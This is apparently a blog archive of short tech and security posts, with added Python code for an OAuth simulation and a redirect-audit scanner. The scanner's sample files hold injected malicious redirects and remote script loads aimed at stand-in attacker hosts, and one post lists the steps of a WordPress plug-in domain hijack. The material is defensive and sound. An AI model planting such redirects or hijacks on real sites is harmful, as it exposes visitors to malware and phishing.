Time to really go paperless when it comes to boarding passes

I have been a big fan of paperless airline boarding passes almost since their introduction, and a recent post reminded me of yet another reason: printed boarding passes can become an easy way to compromise your identity. The reason is a combination of low and high technology, all leveraging your smartphone’s camera.

The issue has to do with the way the airlines make it easy to use the printed bar code information to gain access to your flight details. Brian Krebs first wrote about this several years ago, and if you still use printed boarding passes, the first thing you should know is that you shouldn’t post pictures of them on any of your social media outlets. Krebs found more than 90,000 such images when he did a quick search.

So here is what could happen. Criminals look for these photos, and could then use the QR code or the booking reference number to gain access to your flight details. Think about this for a moment. Let’s say you are on vacation, and you post your “here I am at the airport about to take off for a long trip on the other side of the planet” obligatory photo. Now someone comes along, and can change your return flight, or use this information to leverage more identity theft since the booking contains information such as your passport number and birthdate.

And of course, posting flight details is another way that criminals could decide to pay your unoccupied home a visit while you are away too.

Some folks purposely blur out the details about their name, but leave the barcode visible, such as this photo above, where we can find out her full name by scanning the barcode. Oops.

This method works for dumpster diving too. How many of us leave our used boarding papers on board the aircraft that we are leaving, thinking they are of no further use? I have done that several times. Again, someone could use that information to hijack my account. So avoid leaving your boarding pass in the trash at the airport or tucked into that seat-back pocket in front of you before deplaning. Instead, bring it home and shred it. And don’t take pictures of your boarding pass. Finally, be careful of spreading your “real” birthday around on social media. My “birthday” has been January 1 for several years: my real friends know when it actually is.

So go paperless when you can. And be careful what you post online.

Estonia leads the way in digital innovation

(updated Feb 2, 2018)

My father’s father emigrated to America from Lithuania about a hundred years ago, and one day I intend to visit the Baltic region and see the land for myself, as my sister and I did earlier this year when we visited my mother’s homeland in northeast Poland. In my mind, the next best thing is to follow the activities of Estonia, a neighboring nation that is doing some interesting things online. (I know, my mind works in strange ways. But bear with me, I needed an intro for this essay.)

One reason why I am interested in Estonia is something that they have had in place for many years called the e-Resident program. Basically, this is an ID card issued by their government, for use by anyone in the world. You don’t have to ever live there, or even want to live there. More people have signed up for this ID than are actual residents of the country, so it was a smart move by their government to widen their virtual talent pool. Once you have this ID, you can register a new business in a matter of minutes. Thousands of businesses have been started by e-Residents, which also helps to bring physical businesses there too. In many countries, offshore businesses are required to have a local director or local address. Not Estonia.

So last week, after thinking more about this, I finally took the e-Resident plunge. It costs about $100; you need to take a picture of your local passport and fill out a simple form. When the ID card is ready, you have to physically go and pick it up at a local Estonian embassy (either NYC or DC would be the closest places for me; I chose NYC). You select your pickup site when you register and can’t change it.

Well, as usual, it was bad timing for me. I should have waited a little bit longer. This week we learned that there are potential exploits with the ID cards, at least the cards that have been circulating for the past several years. Almost 750,000 cards are affected. According to Estonian officials, the risk is a theoretical one and there is no evidence of anyone’s digital identity actually being misused. It might change how the IDs are used in next month’s national elections, although they haven’t decided on that. About a third of their voters do vote online.

Update: They have issued a fix, which requires you to update the certs that are attached to your ID. So last week (January 2018), I went to their embassy in NYC and got my kit, which includes the ID card, a nifty little USB reader, and some very bare-bones instructions. My first attempt at installing the software on my Windows 10 laptop was met with failure. A second attempt on another Windows PC eventually worked. My biggest complaint is the tech support: an email to one address took several days for a reply, which told me to send it to another email address (in three different languages, no less). The ID card software (shown here) installs four different programs on your computer, each with somewhat similar names. The cert update process requires your full attention and a solid Internet connection: if you lack either, you will have to re-run it.

The ID card software is also somewhat finicky. It has a place for you to upload your photo, but that didn’t seem to work. You are assigned an official Estonian email address, which I wanted to try to forward to my actual email account, and instructions were lacking on how to do this.

So overall, I give Estonia a passing grade for e-Resident, but just barely. It is hard to use and still needs some work. If a member of the public isn’t computer savvy, they will have a hard time getting going with the whole process. Navigating the numerous web pages for help is tedious and daunting. If you are thinking about the program, I would recommend waiting until they work out the bugs.

Now back to my earlier blog post for some other background info.

Estonia is leading the world in other digital matters too. Lots of companies have disaster recovery data centers located far from their headquarters, but that is an issue with Estonia, which is small enough that “far” is just a few minutes’ drive. So they came up with another plan to make Estonia the first government to build an off-site data center in another country. The government will make backup copies of its critical data infrastructure and store them in Luxembourg if agreements between the two countries are reached. My story in IBM’s Security Intelligence blog goes into more details of what they call their “data embassy.” They have lots of other big digital plans too, such as using 100% digitized textbooks in their education system by the end of the decade and a public sector data exchange facility with Finland they are putting in place for this year.

Earlier this year, I read about a course they offered called “Subversive Leverage and Psychological Defense” to master’s degree students at their Academy of Security Sciences. The students are preparing for positions in the Estonian Internal Security Service. The story from CSM Passcode goes into more details about how vigilant they have to be to fight Russian propaganda. These aren’t isolated examples of how sophisticated they are. They also were the first EU country to teach HTML coding in its elementary schools back in 2012, and the Skype software was developed there.

Their former Prime Minister Taavi Rõivas has even appeared on The Daily Show with Trevor Noah to talk about these programs. Clearly, they have a strong vision, made all the more impressive by the fact that they had almost no Internet access just a few years ago when they were still part of the Soviet empire. Certainly a place to keep an eye on.

iBoss blog: What is OAuth and why should I care?

The number of choices for automating login authentication is a messy alphabet soup of standards and frameworks, including SAML, WS-Federation, OpenID Connect, OAuth, and many others. Today I will take a closer look at OAuth and recent developments that favor this standard.

The idea behind all of these standards is to automate the login process, so your users don’t have to remember their many logins and passwords for connecting to various resources. That sounds great in theory, but getting the automation to work properly isn’t always easy or obvious. To pull this off, you have to conquer some technical challenges that involve just-in-time user provisioning, adapting to consumer-based SaaS services as well as supporting enterprise apps, and understanding exactly how they provide the automation itself.

OAuth began its life about seven years ago as an open standard created by Twitter and Google to handle authorization. It has seen a lot of revisions since then. OAuth now has two different versions in current usage; v2 is the most recent, more capable and more widely used. The two aren’t compatible and rely on two different standards specifications (more specifically, RFC 5849, superseded by RFC 6749). Today OAuth has dozens of supporters.

A good example of how OAuth is used is when two websites are trying to accomplish something on behalf of a user: both of them have to figure out how to approve the user and get that unit of work done. If you have to think of it as something, don’t call it a protocol: it actually is the authorization plumbing inside the authentication protocols. A good explanation of the more technical underpinnings of OAuth and its relationship to authentication and OpenID and SAML can be found here.

Okay, so having gotten that out of the way, where does OAuth show up in security practice? Typically, enterprises adopt OAuth through using a single sign-on tool, such as Ping Identity, Okta, or SecureAuth. These tools control the overall login process by connecting an identity provider, such as Active Directory, with a collection of applications. The actual process is that instead of a user directly entering their username and password into an app’s login screen, they work with an identity provider that encrypts and then federates their credentials to the apps as part of the authentication process. Once this chain of events is set up, a user doesn’t really see what happens: they click on an app and they are logged in properly. Corporate security managers like this process to be hidden, because then they don’t have to worry about resetting individual users’ passwords.

Another example is with iBoss’ Web Gateway Security. iBoss makes use of OAuth to integrate its security policies with users’ Google accounts to cover BYOD situations and manage guest wireless access. A customizable captive portal automatically binds these BYOD users to a variety of directory services including Active Directory, eDirectory, Open Directory, and LDAP.

Earlier this year, Google updated its G Suite with the ability to do OAuth apps whitelisting. This means that a site administrator can have more granular control over what third-party apps do with G Suite data. You can set up permissions for specific data types, such as allow access to your staff’s Google Drive documents but not their contact lists, for example. This prevents rogue apps from accessing data unintentionally.

OAuth isn’t perfect: attackers can still phish a user’s credentials during the authentication process using man-in-the-middle attacks, which is one of the reasons why Google is providing more control over OAuth across its SaaS app suite. And OAuth also doesn’t provide encryption or client verification: you will need to employ Transport Layer Security for these protective features. Nevertheless, it is being used for more apps and gaining wider acceptance, and should be a part of your security toolkit.
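To make the “authorization plumbing” concrete, here is an added, self-contained simulation of the OAuth 2.0 authorization-code grant from RFC 6749, which is not code from the post or from any of the vendors mentioned. It models the three parties (user, relying web app, identity provider) in one process with no network, using made-up hosts (idp.example, app.example) and a made-up client registration, and it shows the two checks a defender cares most about: the client binds the callback to its own request with an unguessable state value, and the server accepts each code once, only for the exact redirect URI it registered.

```python
"""Simulated OAuth 2.0 authorization-code grant (RFC 6749, section 4.1). Added illustration, not code
from the post: runs in-process with no network; idp.example, app.example and the client credentials are made up."""
import secrets
import time
from urllib.parse import parse_qs, urlencode, urlparse


def _flat(query):  # parse_qs returns lists; keep the first value of each parameter
    return {k: v[0] for k, v in parse_qs(query).items()}


class AuthorizationServer:
    """Stands in for the identity provider (the 'authorization server')."""

    def __init__(self):
        self.clients = {}  # client_id -> (client_secret, registered redirect_uri)
        self.codes = {}    # code -> (client_id, redirect_uri, scope, user, expiry)
        self.tokens = {}   # access_token -> (user, scope)

    def authorize(self, query, user):
        """Authorization endpoint, after `user` has logged in here and approved the request."""
        p = _flat(query)
        registered = self.clients.get(p.get("client_id"), (None, None))[1]
        # Send the code only to the exact redirect URI registered for this client (RFC 6749 3.1.2.2).
        if registered is None or p.get("redirect_uri") != registered:
            raise ValueError("invalid_request: unknown client or redirect_uri mismatch")
        code = secrets.token_urlsafe(24)
        self.codes[code] = (p["client_id"], registered, p.get("scope", ""), user, time.time() + 60)
        # Echo `state` back untouched so the client can tie this response to its own request.
        return registered + "?" + urlencode({"code": code, "state": p.get("state", "")})

    def token(self, client_id, client_secret, code, redirect_uri):
        """Token endpoint: redeem a single-use, short-lived code for a bearer token."""
        secret = self.clients.get(client_id, (None, None))[0]
        if secret is None or not secrets.compare_digest(secret, client_secret):
            raise ValueError("invalid_client")
        entry = self.codes.pop(code, None)  # pop: a code is accepted exactly once
        if entry is None:
            raise ValueError("invalid_grant: unknown or already used code")
        c_id, c_redirect, scope, user, expiry = entry
        if c_id != client_id or c_redirect != redirect_uri or time.time() > expiry:
            raise ValueError("invalid_grant: wrong client or redirect_uri, or code expired")
        token = secrets.token_urlsafe(32)
        self.tokens[token] = (user, scope)
        return {"access_token": token, "token_type": "Bearer", "scope": scope}


class ClientApp:
    """The relying web app. It never sees the user's password, only the code and the token."""

    def __init__(self, server, client_id, client_secret, redirect_uri):
        self.server, self.client_id, self.client_secret, self.redirect_uri = server, client_id, client_secret, redirect_uri
        self.pending_states = set()

    def begin_login(self, scope):
        state = secrets.token_urlsafe(16)  # unguessable per-request value (CSRF binding)
        self.pending_states.add(state)
        return "https://idp.example/authorize?" + urlencode({
            "response_type": "code", "client_id": self.client_id,
            "redirect_uri": self.redirect_uri, "scope": scope, "state": state})

    def handle_callback(self, redirect_url):
        p = _flat(urlparse(redirect_url).query)
        # Refuse any callback we did not start: blocks login-CSRF and injected codes.
        if p.get("state") not in self.pending_states:
            raise ValueError("state mismatch")
        self.pending_states.discard(p["state"])
        return self.server.token(self.client_id, self.client_secret, p["code"], self.redirect_uri)


def _setup():
    server = AuthorizationServer()
    server.clients["app1"] = ("s3cret", "https://app.example/cb")  # constructed client registration
    return server, ClientApp(server, "app1", "s3cret", "https://app.example/cb")


def run_flow(user="alice", scope="drive.readonly"):
    """Happy path; returns the (user, scope) pair the issued token is bound to."""
    server, app = _setup()
    callback = server.authorize(urlparse(app.begin_login(scope)).query, user)
    tok = app.handle_callback(callback)
    return server.tokens[tok["access_token"]]


def misuse_rejected():
    """Whether two classic misuses are stopped by the checks above."""
    server, app = _setup()
    results = {"forged_state": False, "code_replay": False}
    app.begin_login("profile")
    try:  # a callback carrying a state the app never issued (login CSRF / code injection)
        app.handle_callback("https://app.example/cb?code=stolen&state=forged")
    except ValueError as err:
        results["forged_state"] = "state" in str(err)
    callback = server.authorize(urlparse(app.begin_login("profile")).query, "bob")
    app.handle_callback(callback)  # legitimate redemption
    try:  # redeeming the same code a second time
        server.token("app1", "s3cret", _flat(urlparse(callback).query)["code"], "https://app.example/cb")
    except ValueError as err:
        results["code_replay"] = "already used" in str(err)
    return results
```

Everything here still travels over plain function calls; in a real deployment every one of these exchanges must sit behind TLS, which is the point the paragraph above makes.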

Stopping malicious website redirects

In my work as editor of Inside Security’s email newsletter, I am on the lookout for ways that criminals can take advantage of insecure Internet infrastructure. I came across this article yesterday that I thought I would share with you and also take some time to explain the concept of the malicious redirect. This is how the bad guys turn something that was designed to be helpful into an exploit.

A redirect is a bit of code (HTML or web-server configuration) that sends a visitor from a URL that is no longer in service to its new location, so you don’t lose that visitor. The most likely situation is that someone clicked on an old link and landed on the retired page, so you direct them to the appropriate place on your website. Simple, right?

Now the bad guys have taken this same mechanism and, instead of being helpful, use the redirect code to point you to a place that contains some malware, in the hope that you won’t notice the new web page is a trap. In an instant, your computer is infected with something. Surprise! Sadly, this happens more and more.

In a post on Sucuri’s blog, researchers describe several ways the malicious redirect can happen. One way is by leveraging configuration files such as .htaccess or .ini files. These are files associated with web servers that control all sorts of behavior and are usually hidden from ordinary browsing. Usually, your website security prevents folks from messing with these files, but if you made setup errors or if you aren’t paying attention, the configuration files can be exposed to attackers. Another way is by having an attacker mess with your DNS settings so that visitors to your site end up going somewhere else. How does an attacker gain access to your DNS servers? Typically, it is through a compromised administrative account password. Do you really know who in your organization has access to this information? Probably more people than you realize. When was the last time you changed this password anyway?

My office is in a condo complex that has several doors to a public alley. Each of the doors has a combination lock and all of the doors have the same combination. A year or so ago, the board was discussing that it might be time to change the combination because many people – by design – know what this combination is. This is just good security practice. Now the analogy isn’t quite sound – by design a lot of people have to know this number, otherwise no one can get out to the alley to take their trash out – but still, it was a good idea to regularly change the access code.

Neither of these exploit methods is new: they have been happening almost since the web became popular, sadly. So it is important that if you run websites and don’t want your reputation ruined or have some criminal spreading malware that you at least understand what can happen and make sure that you are protected.

But there is another way redirects can happen: by an attacker grabbing an expired domain name and leveraging its associated WordPress plug-in. Since a lot of you run WordPress sites, I want to take a moment to describe this attack method.

  • Attacker finds a dormant plug-in in the WordPress catalog. Given the thousands of plug-ins, there are lots of them that haven’t been updated in several years.
  • Check the underlying domain name that is used for the plug-in. If it isn’t active, purchase and register the name.
  • Set up a website for this domain that contains malicious JavaScript code for the redirect.
  • Change the code on your plug-in to serve up the malware whenever anyone uses it.
  • Hope no one notices and sit back as the Internet spreads your nasty business far and wide.

Moral of the story: Don’t use outdated plug-ins, and limit the potential for attacks by deleting unused plug-ins from your WordPress servers anyway. Make use of a tool such as WordFence to protect your blogs. Update your blog with the latest versions of WordPress and the latest plug-in versions too while you are at it.
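One practical check that follows from both the Sucuri findings and the expired-domain scenario above is to audit what your own site hands visitors off to. The script below is an added example, not from the post or from Sucuri or WordFence: it scans an .htaccess file, a plug-in’s JavaScript and a theme template for redirect rules, script loads and location changes, and flags every target host that is neither your own site nor on an explicit allow-list of third parties you trust. All three sample files are constructed for the demonstration, and the .example and .test hostnames are reserved names, not real sites.

```python
"""Scan a site's .htaccess, plugin JavaScript and theme HTML for redirects or script loads that
send visitors off-site. Added illustration, not from the post or Sucuri; all sample content is
constructed and the .example / .test hostnames are reserved names, not real sites."""
import re
from urllib.parse import urlparse

# Each pattern captures the URL a line hands the visitor (or the browser's script loader) to.
PATTERNS = [
    ("htaccess Redirect", re.compile(
        r"^\s*Redirect(?:Permanent|Temp|Match)?\s+(?:(?:\d{3}|permanent|temp|seeother|gone)\s+)?\S+\s+(\S+)", re.I)),
    ("htaccess RewriteRule", re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)),
    ("script src", re.compile(r"\bsrc\s*=\s*[\"']([^\"']+)", re.I)),
    ("JS location", re.compile(r"location(?:\.href)?\s*=\s*[\"']([^\"']+)", re.I)),
    ("JS location call", re.compile(r"location\.(?:replace|assign)\(\s*[\"']([^\"']+)", re.I)),
    ("meta refresh", re.compile(r"http-equiv\s*=\s*[\"']refresh[\"'][^>]*url=([^\"'\s;>]+)", re.I)),
]


def target_host(url):
    """Hostname of an absolute http(s) URL; None for relative paths and non-web schemes."""
    url = url.strip()
    if url.startswith("//"):          # protocol-relative URLs still leave the site
        url = "https:" + url
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return None
    return (parsed.hostname or "").lower()


def audit(site_host, sources, allowed_hosts=()):
    """sources: {label: file text}. Returns one finding per target outside site_host
    (and its subdomains) that is not on the explicit allow-list of third-party hosts."""
    site_host = site_host.lower()
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for label, text in sources.items():
        for lineno, line in enumerate(text.splitlines(), 1):  # line-based: a <script> split across lines is missed
            for kind, rx in PATTERNS:
                for m in rx.finditer(line):
                    host = target_host(m.group(1))
                    if host is None or host == site_host or host.endswith("." + site_host) or host in allowed:
                        continue
                    findings.append({"source": label, "line": lineno, "kind": kind,
                                     "url": m.group(1), "host": host})
    return findings


# --- constructed sample inputs -------------------------------------------------------------
SAMPLE_HTACCESS = """\
# legitimate: an old URL moved within the site
Redirect 301 /old-page https://blog.example/new-page
RewriteEngine On
# injected: bounces mobile visitors to a third-party host
RewriteCond %{HTTP_USER_AGENT} (android|iphone) [NC]
RewriteRule ^(.*)$ http://cdn-stats-update.example-attacker.test/go.php?$1 [R=302,L]
"""

SAMPLE_PLUGIN_JS = """\
// helper script shipped by an abandoned plug-in whose domain changed hands
var s = document.createElement('script');
s.src = "//widgets.example-expired-plugin.test/loader.js";
document.head.appendChild(s);
if (document.referrer.indexOf('google') !== -1) {
    window.location.href = "https://lucky-prize.example-attacker.test/";
}
"""

SAMPLE_THEME_HTML = """\
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="/wp-includes/js/wp-embed.min.js"></script>
<meta http-equiv="refresh" content="0;url=https://login-verify.example-attacker.test/">
"""


def audit_sample():
    """Run the audit over the constructed files for a site served as blog.example."""
    return audit("blog.example",
                 {".htaccess": SAMPLE_HTACCESS, "plugin.js": SAMPLE_PLUGIN_JS, "header.php": SAMPLE_THEME_HTML},
                 allowed_hosts={"cdnjs.cloudflare.com"})


if __name__ == "__main__":
    for f in audit_sample():
        print(f"{f['source']}:{f['line']} [{f['kind']}] -> {f['host']}  ({f['url']})")
```

Any host this reports that you did not put there yourself deserves a look, and a plug-in that loads its code from a domain you cannot confirm is still owned by its author is exactly the case the list above describes.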

When I first started using WordPress more than a decade ago, I went plug-in crazy and loaded up more than a dozen different ones for all sorts of enhancements to my blog’s appearance and functions. Now I am more careful, and only run the ones that I absolutely need. Situations such as this malicious redirect are a good reason why you should follow a similar strategy.

FIR B2B podcast #79: How to find the right CMO for your startup

This week Paul Gillin and I talk to Crowded Ocean’s partners Carol Broadbent and Tom Hogan. The two have written The Ultimate Startup Guide, the foundation of which is their work with 47 different startups over the past 10 years. Ten of those companies have had successful exits, and only two went out of business, so our guests have credibility.

We invited them to join us after we read their piece in VentureBeat about “marketing-as-a-service.” Most organizations hire their CMOs first, but the duo recommend that this should actually be the last position to be filled by a startup. “Most CMOs have a bulls-eye painted on their backs, they have the shortest tenure, and often startups hire the wrong species,” they said.

Instead, Carol and Tom suggest that you examine more closely the different component skills that make up marketing, and staff accordingly. These include product management, corporate marketing, product marketing and IT fluency. The evolved CMO has the backbone of the marketing department, the breadth and understanding of the customer experience and the depth of a new key organizational growth pillar that shapes their point of view. Our guests suggest that the initial full-time marketing insider should be someone that they call “Seth” who is a 28-year-old numbers jockey who can give their sales organization demand generation data.

Other recommendations: Hire a stable of reliable contractors rather than fulfilling every need with full-timers. Simplify your website’s message. “Too many startups want to display all their great ideas and technology on their website, turning it into a library of brochure-ware that a prospect has to wade through,” they wrote in VentureBeat. And design online content and structure that can be useful on mobile devices.

Carol and Tom’s recommendations challenge a lot of the conventional wisdom, but they have the track record to justify them. Listen to our 21 min. podcast here:

Netgear’s Arlo Pro security cameras: Better than before but pricey

This article is the latest installment in my smart home series. A natural addition to any smart home would be to use security cameras to monitor your entry points. I tested the latest Netgear Arlo cameras, including the Arlo Pro and the Arlo Go. Overall, my review is mixed.   

Netgear has had its Arlo line for several years. What is new with these two units is the rechargeable batteries, so you don’t spend a small fortune on replacing the ones in the cameras. The design goal with Arlo is that you can run them completely cable-free, so you can place them optimally without regard to wiring. By that they mean that you don’t have to run any wires to them, either for power or network connectivity.

But there are two different battery sizes for the Pro and the Go models. Go includes a slightly larger unit that comes with its own stand. Pro has a smaller magnetic attachment device to be mounted on the wall. Either Pro or Go batteries can be recharged outside the camera with an optional $60 charging dock, which is included in some of the multiple-camera kits.

The older Arlo models used ordinary batteries that drained quickly. These newer models use rechargeable ones that last a couple of weeks, depending on usage. The Pro connects via Wi-Fi, while the Go has its own AT&T SIM card, which means the Go can be placed anywhere that has a cell signal, even if you don’t have any indoor Wi-Fi. You can see the signal strength on its web portal page. This is great for a remote cabin in the woods, as long as it isn’t too far afield from a cell tower.

Both of the newer cameras can record ambient audio and capture a 130-degree video view in HD quality, along with night vision at 850 nm that can see things up to 25 feet away. You can also control an 8x zoom lens in real time. The original Arlo cameras had a 110-degree view and no audio capabilities.

Camera setup is very simple. You connect the controller to your wired network, download the smartphone app, and press the button on the controller and then on each camera for it to be recognized by the system. You need to create a login ID with the web service. One ID per system only. Once you have set up the cameras with this login, you can use the smartphone app outside of your home network.

You can only be logged in at one location: either via the smartphone app or the web portal. This is a security feature. The web and smartphone app controls are almost the same, with the exception of geo-fencing mode that is available on the phone app only.

The cameras have four different detection modes: armed, schedule, geo, and disarmed. The schedule mode allows you to turn off the detection during the weekend or when motion sensing would kick off too many alerts. You can also set up your own custom rules for all the cameras connected to your hub or for particular Go cameras.

You can set various thresholds for motion (the claim is 23 feet from the camera) or sound detection. Then the cameras record the next ten seconds. When you purchase the camera, you get a free week’s worth of video storage in the cloud; after that you have to purchase a storage plan if you want to keep the videos for any length of time. (You can access your video library easily at any time, shown here.) You can download these videos as MP4s, and also share them with Netgear. If you use the Pro models, they attach to a local controller, which has two USB slots where you can fit a USB thumb drive for local storage. The Go units have a microSD slot where you can store your video recordings.

The biggest new feature of the Pro/Go cameras is audio, and it is two-way so you can get an alert via email and then talk remotely to someone who has stopped by your lake house and knocked on your door when you aren’t home as an example. You can also set off a very loud alarm remotely if you see something amiss.

The Arlo setup comes with a free basic subscription plan. This covers up to five cameras and up to seven days of 1 GB of cloud storage for your recordings. There are a variety of paid consumer and business plans that up the level and duration of storage and the number of cameras per account; these start at $100/year per account. The cameras retail for $950 in a kit that includes six Pro cameras, several wall mount options, power chargers and a base station. A single camera system is $250. The Go camera on the Verizon cellular network retails for $350, plus $85 a month, provided you sign a two-year contract.

If you have an older Arlo setup, it probably isn’t worth it to upgrade to the Pro or Go collection. If you are looking for a smart home webcam, you can certainly find cheaper models that will require some wiring, or use ordinary batteries. It might be worthwhile to have a single Arlo Pro or a Go in the case of the remote cabin without any Internet connection. If you don’t mind replacing batteries and don’t need the two-way audio, you should stick with the older Arlo models.

iBoss blog: The Dark Side of SSL Certificates

The world of SSL certificates is changing, as the certs become easier to obtain and more frequently used. In general, having a secure HTTP-based website is a good thing: the secure part of the protocol means it is more difficult to eavesdrop on any conversation between your browser and the web server. Despite their popularity, there is a dark side to them as well. Let’s take a closer look at my iBoss blog post this week.

The scourge of patent trolls

One of the tech industry’s dirty secrets is enabling an entire class of bottom-feeders called the patent troll. These are lawyers that exist solely to sue other firms and bleed them dry from the threat of patent infringement. A new documentary is out by Austin Meyer (shown here), who suffered from one troll purely because he uploaded his app to the Google Play store. The troll claimed his patent covered such activity, which is just utter nonsense. As shown in Meyer’s movie, almost all defendants settle patent cases to avoid the costs of discovery and a protracted legal battle. There are several thousand troll-based lawsuits filed annually, and the number is increasing.

Sadly, what these trolls do is also perfectly legal. But what gets my goat is that the trolls don’t actually make anything: it isn’t like they have a competitive product line that they are trying to protect with their lawsuit. They are really just racketeers, extortion con men. Many of these firms, like Virnetx and Uniloc, are companies that you never heard of, and are getting rich from these troll payouts.

For example, several years ago Virnetx beat Apple and now gets $300M a year in royalties because Facetime was claimed to infringe on secure network communications patents it held. That took years to work its way through the courts in eastern Texas.

Wait a minute. Why Texas? Isn’t Apple’s HQ in California? Yes, but until recently, trolls could file wherever they pleased. Many of the patent cases are tried in eastern Texas, because the area’s court system is especially friendly to trolls. For example, in the small town of Marshall, Judge Rodney Gilstrap oversaw more than a quarter of the country’s patent cases in 2015, reports the Electronic Frontier Foundation. Marshall figures prominently in Meyer’s movie, where he takes us literally on a tour of the empty offices across the street from the county courthouse where these patent cases are tried. All these offices are quite representative of these shell companies that are the trolls.

One delightful tidbit that he missed was that hotels in Marshall are so commonly frequented by lawyers that one even purchased a subscription to the electronic court-records system Pacer. You have in-room Wi-Fi, now there is in-room legal records search. How convenient. Earlier in May this year the US Supreme Court unanimously ruled that a defendant should only face patent litigation in the state where it’s incorporated, which for many tech businesses is either California or Delaware. Meyer tells me that that hasn’t really stemmed the tide in Marshall, so probably that hotel will keep their in-room Pacer subscription.

Not all trolls succeed. In one case, Uniloc was defeated when a group of gaming companies showed the flaws in their argument in a case that was decided by an internal review by the US Patent office earlier this year. Uniloc is one of the more notorious trolls, but this is a minor setback: they have a huge collection of judgements from other cases. Uniloc was who sued Meyer, btw.

One of the issues mentioned in Meyer’s movie is how once the trolls identify a potential victim (not too small and not too large, so that the firm will be motivated to pay out rather than fight), they are often hit repeatedly by other trolls. The typical lawsuit will cost several million dollars. Another issue: trolls sue people that use the patented idea, no matter how ridiculous the patent may be.

Patent trolls aren’t a new topic; indeed there is another documentary by Lex Lybrand called The Trolls that came out last year that documents his experience when his crowdfunded company was hit by a troll. And John Oliver did one of his HBO Last Week Tonight shows on patents a few years ago. (He illustrates his points with several great Shark Tank snippets.) Meyer is also featured on Oliver’s segment.

Meyer has several suggestions for improving the patent process, and many of them have little hope of happening, thanks to trial lawyer lobbies and other market forces. But if you want to see how broken our patent system is, the movie is well worth your time.

Meyer’s movie, The Patent Scam, is now available for a fee to download and soon will be on Netflix and other streaming services.

Learning from a great public speaker, Reuben Paul

I got a chance to witness a top-rated speaker ply his trade at a conference that I attended this week here in St. Louis. The conference was a gathering of several hundred people who work in IT for our intelligence agencies, called DoDIIS. When I signed up for press credentials, I didn’t know he was going to be speaking, but glad that I could see him in action. As someone who speaks professionally at similar groups, I like to learn from the best, and he was certainly in that category.

The odd thing about this person is that he is still a kid, an 11-year-old to be exact. His name is Reuben Paul and he lives in Austin. Reuben already has spoken at numerous infosec conferences around the world, and he “owned the room,” as one of the generals who runs one of the security services mentioned in a subsequent speech. What made Reuben (I can’t quite bring myself to use his last name as common style dictates, sorry) so potent a speaker is that he was funny and self-deprecating as well as informative. He was both entertaining and instructive. He did his signature story, as we in the speaking biz like to call it, a routine where he hacks into a plush toy teddy bear (shown here sitting next to him on the couch along with Janice Glover-Jones, who is the CIO for the Defense Intelligence Agency) using a Raspberry Pi connected to his Mac.

The bear makes use of a Bluetooth connection to the Internet, along with a microphone to pick up ambient sound. In a matter of minutes, Reuben was showing the audience how he was able to record a snippet of audio and play it back on the bear’s speaker, using some common network discovery tools and Python commands. Yes, the kid knows Python: something that impressed several of the parade of military generals who spoke afterwards. These generals semi-seriously were vying to get the kid to work for their intelligence service agencies once he was no longer subject to child labor restrictions.

The kid is also current with the security issues of the Internet of Things, and can show you how an innocent toy can become the leverage point for hackers to enter your home and take control without your knowledge. This has become very topical, given the recent attacks using WannaCry, Petya and others that target these connected objects.

Reuben also managed to shame the IT professionals attending the conference. As the video monitors on stage were showing him scrolling down the list of network addresses from phones that were broadcasting their Bluetooth signals, he told us, “if you see your phone listed here, you might remember next time to turn off your Bluetooth for your own protection.” That got a laugh from the audience. Yes, this kid was shaming us and no one got upset! We were in the presence of a truly gifted speaker. I had made a similar point in my speech just a couple of weeks ago about Bluetooth vulnerability, and much less adroitly.

Reuben isn’t just a one-trick pony (or bear), either. The kid has set up several businesses already, which is impressive enough even without considering his public speaking prowess. One of them is this one that helps teach kids basic cybersecurity concepts. Clearly, he knows his audience, which is another tenet of a good speaker. If you ever get a chance to see him in person, do make the effort.

iBoss blog: What Is the CVE and Why It Is Important

The Common Vulnerabilities and Exposures (CVE) program was launched in 1999 by MITRE to identify and catalog vulnerabilities in software or firmware and create a free lexicon to help organizations improve their security. Since its creation, the program has been very successful and is now used to link together different vulnerabilities and to facilitate the comparison of security tools and services. You now see evidence of its work by the unique CVE number that accompanies a malware announcement by a security researcher.

In my latest blog post for iBoss, I look at how the CVE got started, where it is used, and the importance it plays in sharing threat information.